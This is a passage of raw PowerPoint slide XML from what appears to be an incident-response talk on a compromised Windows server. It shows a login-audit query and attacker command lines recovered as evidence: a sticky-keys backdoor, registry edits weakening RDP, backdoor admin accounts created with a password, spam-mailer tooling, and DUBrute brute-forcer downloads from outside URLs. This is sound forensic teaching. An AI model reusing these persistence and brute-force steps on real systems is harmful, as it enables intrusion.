                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C:\windows\system32\cmd.exe sethc.exe</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32" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>211</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		0x3e7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="676606" y="1405211"/>
            <a:ext cx="11083265" cy="3751791"/>
            <a:chOff x="2121085" y="1404124"/>
            <a:chExt cx="7422261" cy="2512505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121085" y="1404124"/>
              <a:ext cx="7422261" cy="2512505"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3955675" y="2872407"/>
              <a:ext cx="796774"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43417" y="3150703"/>
              <a:ext cx="4027272"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3626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Examine Logins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700334" y="4628333"/>
            <a:ext cx="10724938" cy="156253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Same IP used across multiple accounts: Administrator, redacted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252725" y="1747351"/>
            <a:ext cx="12182868" cy="862712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9932CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProdLoginAuditEvents</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TimeCreated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datetime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2016-04-15 23:10:25.9896262) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and</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TimeCreated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datetime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2016-04-15 23:20:25.98962623)| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subscription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B22222"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"..."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and</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VMName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B22222"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"..."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subscription</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TimeCreated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TargetUserName</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IpAddress</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SubjectUserName</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LogonType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IpPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1224" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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2594335" y="5155882"/>
            <a:ext cx="9206272" cy="1551619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8114530" y="4275316"/>
            <a:ext cx="0" cy="11342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2698749" y="2563812"/>
            <a:ext cx="7038975" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6523037" y="208875"/>
            <a:ext cx="5855563" cy="663001"/>
            <a:chOff x="3752806" y="3403404"/>
            <a:chExt cx="4264070" cy="780533"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3752806" y="3403404"/>
              <a:ext cx="4264070" cy="780533"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1E1E1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3200" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3863806" y="3539676"/>
              <a:ext cx="4147962" cy="615973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Detections * Hits = Threat Intel + 1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151976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3" name="Table 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="116916" y="93260"/>
          <a:ext cx="12137666" cy="6714756"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="12137666">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1684392900"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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C:\Windows\Explorer.EXE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561939489"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="186521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>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C:\Users\ADMINI~1\AppData\Local\Temp\3\wrsd.exe  429308 z</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49847818"/>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add "HKLM\SYSTEM\</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CurrentControlSet</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\Control\Terminal Server\</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WinStations</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\RDP-</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Tcp</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UserAuthentication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 REG_DWORD /d 1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358742346"/>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add "HKEY_LOCAL_MACHINE\SYSTEM\</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CurrentControlSet</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\Control\Terminal Server\</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WinStations</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\RDP-</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Tcp</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UserAuthentication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 REG_DWORD /d 1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478749151"/>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delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</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CurrentVersion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\Policies\System"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legalnoticecaption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76110067"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="186521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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reg</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delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</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CurrentVersion</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\Policies\System" /v </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legalnoticetext</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/f</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638938443"/>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user ASPNET crystal123!@# /add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718346324"/>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localgroup Administrators ASPNET /add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289702643"/>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user ___VMware_Conv_SA___ crystal123!@# /add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722222803"/>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localgroup Administrators ___VMware_Conv_SA___ /add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59983110"/>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(x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4816 CREDAT:267521 /prefetch:2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571132999"/>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"C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FB7Z3X4W\TurboMailer-Setup.exe"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57070098"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="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TurboMailer</a:t>
                      </a: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\TurboMailer.exe"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974728998"/>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C:\Users\Administrator\Desktop\400k\400k.txt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754218661"/>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C:\Users\Administrator\AppData\Local\Temp\3\Temp1_DUB8.2.zip\DUB8.2\config.ini</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238528871"/>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"C:\Users\Administrator\AppData\Local\Temp\3\Temp1_DUB8.2.zip\DUB8.2\DUB8.2.exe"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232605103"/>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  user guest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208397650"/>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(x86)\TurboMailer\turbomailer.exe"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131694483"/>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C:\Users\Administrator\Desktop\april17.txt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51946092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C:\Users\Administrator\AppData\Local\Temp\3\Temp1_march.zip\march.txt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27028788"/>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"C:\Users\Administrator\Downloads\dn2.exe"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588362767"/>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"C:\Users\Administrator\Downloads\f.exe"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310746249"/>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"C:\Users\Administrator\Downloads\x.exe"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946422716"/>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"C:\Users\Administrator\Downloads\y.exe"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86261029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"C:\Users\Administrator\Downloads\dn2.exe"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33749722"/>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"C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\DUBrute.exe"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448048571"/>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C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\good.txt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217010220"/>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C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\Logins.txt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411595484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C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\Passwords.txt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166356375"/>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(x86)\Google\Chrome\Application\chrome.exe" -- "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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2"/>
                        </a:rPr>
                        <a:t>http://119.10.151.120:1234/3.zip</a:t>
                      </a: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778246684"/>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"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Administrator\Downloads\DUBrute 2.1 (UPDATE 03.03.12)\ssleay32.dll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470992288"/>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C:\Users\Administrator\Downloads\DUBrute 2.1 (UPDATE 03.03.12)\config.ini</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4082942419"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="186521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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http://ys-h.ys168.com/3.0/548253621/SIuMfJl7K3T5561HXPJK/DUB_8.0.zip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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518938423"/>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C:\Users\Administrator\Downloads\DUBrute_8.0\admin.txt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3150825482"/>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"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Downloads\DUBrute_8.0\password.txt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2902080464"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="186521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAf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"C:\Users\Administrator\Downloads\DUBrute_8.0\DUBrute.exe"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700" marR="31700" marT="0" marB="0" anchor="b">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1413607468"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6678299" y="93260"/>
            <a:ext cx="3650702" cy="699453"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -111196"/>
              <a:gd name="adj2" fmla="val -32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2040"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wrsd.exe  429308 z</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2040" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6678298" y="1336911"/>
            <a:ext cx="5129386" cy="570544"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61118"/>
              <a:gd name="adj2" fmla="val -5575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reg</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delete ...</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legalnoticecaption</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836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4417959" y="2209381"/>
            <a:ext cx="7682875" cy="1523768"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55996"/>
              <a:gd name="adj2" fmla="val -8339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net  user ASPNET crystal123!@# /add</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net  user ___</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VMware_Conv_SA</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___ crystal123!@# /add</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net  </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localgroup</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836" kern="0"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Administrators</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ASPNET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0"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/add</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net  </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localgroup</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836" kern="0"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Administrators</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 ___</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VMware_Conv_SA</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___ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0"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/add</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7" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1649744" y="3618873"/>
            <a:ext cx="10057107" cy="1523768"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40982"/>
              <a:gd name="adj2" fmla="val -928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"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" </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...Temporary Internet Files\...\TurboMailer-Setup.exe"</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"C:\Program Files (x86)\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0" err="1">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TurboMailer</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836" kern="0"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TurboMailer.exe</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NOTEPAD.EXE C:\Users\Administrator\Desktop\400k\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0"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400k.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460349" y="5284235"/>
            <a:ext cx="7865002" cy="1617029"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58093"/>
              <a:gd name="adj2" fmla="val 135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chrome.exe -- "http://ys-h.ys168.com/3.0/.../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0"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DUB_8.0.zip</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836" kern="0"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DUBrute.exe</a:t>
            </a:r>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"C:\Windows\system32\NOTEPAD.EXE" good.txt</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"C:\Windows\system32\NOTEPAD.EXE" Logins.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597"/>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"C:\Windows\system32\NOTEPAD.EXE" Passwords.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3136348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1057987" y="1345772"/>
            <a:ext cx="10309567" cy="5347723"/>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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057987" y="1345772"/>
            <a:ext cx="10309568" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="505050"/>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="505050">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
